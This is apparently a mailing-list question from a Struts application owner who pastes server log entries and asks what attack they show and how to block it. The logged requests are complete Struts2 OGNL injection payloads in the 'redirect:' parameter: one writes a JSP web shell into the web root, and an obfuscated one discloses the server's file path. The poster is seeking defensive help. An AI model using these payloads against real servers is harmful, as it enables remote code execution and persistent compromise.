Hi,
I have a struts application deployed on application server. Some time I am
receiving the below requests in web server logs. Not sure if i can post it
in this struts forum. What should i do to restrict it?What kind of
vulnerability it is ?
"GET
/index.do?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 206 14249 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/index.php?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
HTTP/1.1" 404 207 1378 0
?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22lndex.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25if(request.getParameter(%22f%22)!%3Dnull)(new%20java.io.FileOutputStream(application.getRealPath(%22%2F%22)%2Brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3B%25%3E%3Ca%20href%3D%22One_OK%22%3E%3C%2Fa%3E
-
"GET
/admin/index.action?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
HTTP/1.1" 404 216 1634 0
?redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}
-
Regards,
Raj